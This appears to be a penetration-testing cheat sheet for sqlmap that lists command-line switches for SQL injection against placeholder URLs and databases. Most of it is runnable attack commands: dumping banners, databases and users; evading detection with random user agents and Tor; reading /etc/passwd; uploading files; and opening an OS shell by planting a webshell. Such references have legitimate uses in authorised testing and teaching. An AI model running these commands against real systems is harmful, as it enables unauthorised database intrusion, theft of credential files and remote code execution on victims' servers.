sqlmap

Verbose Level (-v)

  • 0: displays critical info only

  • 1: displays warning info

  • 2: displays debug info

  • 3: displays payload used

  • 4: displays HTTP request body

  • 5: displays HTTP response headers

  • 6: displays HTTP response body

Database Connection (-d)

Connect to a database with credential:

sqlmap -d DBMS://USER:PASSWORD@DBMS_IP:DBMS_PORT/<MySQL/Oracle/Microsoft SQL Server/PostgreSQL>

or connect to a database file:

sqlmap -d DBMS://<SQLite, Microsoft Access, Firebird>

GET (-u)

sqlmap -u "http://<domain>/vuln.php?id=1" -f --banner --dbs --users

POST (--data)

sqlmap -u "http://<domain>/vuln.php" --data="id=1" -f --banner --dbs --users

Load Request from a File (-r)

sqlmap -r <request_from_burp>

Cookie (--cookie)

sqlmap -u <url> --cookie <cookie>

User-Agent (--user-agent)

The default User-Agent header sent by sqlmap is sqlmap/1.0-dev-xxxxxxx, but we can specify an User-Agent header:

sqlmap -u <url> --user-agent=<user_agent> -f --banner --dbs --users

or set a random user agent:

sqlmap -u <url> --random-agent -f --banner --dbs --users

Level (--level)

  • --level=1: default mode

  • --level=2: adds cookie testing

  • --level=3: adds User-Agent testing

  • --level=4: more testing

  • --level=5: adds Host testing

Note that the use of the -p switch bypasses the level. This means that by manually setting the parameter to test, you can perform a more accurate, stealthy and in-depth exploitation.

Risk (--risk)

  • --risk=1: (Default) innocuous injections

  • --risk=2: Enables heavy time-based injections

  • --risk=3: Enables OR-based injections -> using them on UPDATE queries would update all the rows in a table

Proxy (--proxy) and Tor (--tor)

Proxy:

sqlmap --proxy <proxy> -u <url> -f --banner --dbs --users

Tor:

sqlmap --tor -u <url> -f --banner --dbs --users

Blind SQLi (--string, --not-string)

  • Append to --string a string which is always present in True output page

  • Append to --not-string a string which is always present in False output page

Privilege Enumeration (--is-dba)

Determine if the current user is the database admin:

sqlmap -u <url> --is-dba

Download/Upload (--file-read/--file-write/--file-dest)

Download a file:

sqlmap -u <url> --file-read /etc/passwd

Uploads a file:

sqlmap -u <url> --file-write <local_file> --file-dest <target_machine_directory>

RCE (--os-shell)

The following requirements must be satisfied for --os-shell to work:

  1. We have write permission

  2. Pathnames are default

  3. PHP magic_quotes_gpc is disabled

sqlmap -u <url> --os-shell

Behind the scene, sqlmap creates an "upload trojan" on the target machine and uploads a webshell from here.

If the -d option is used, sqlmap will use UDF. For example:

sqlmap -d "mysql://<username>:<password>@<ip>:3306/dedecms" --os-shell
PreviousWebshell and UDFNextCode Review: Initialization

Last updated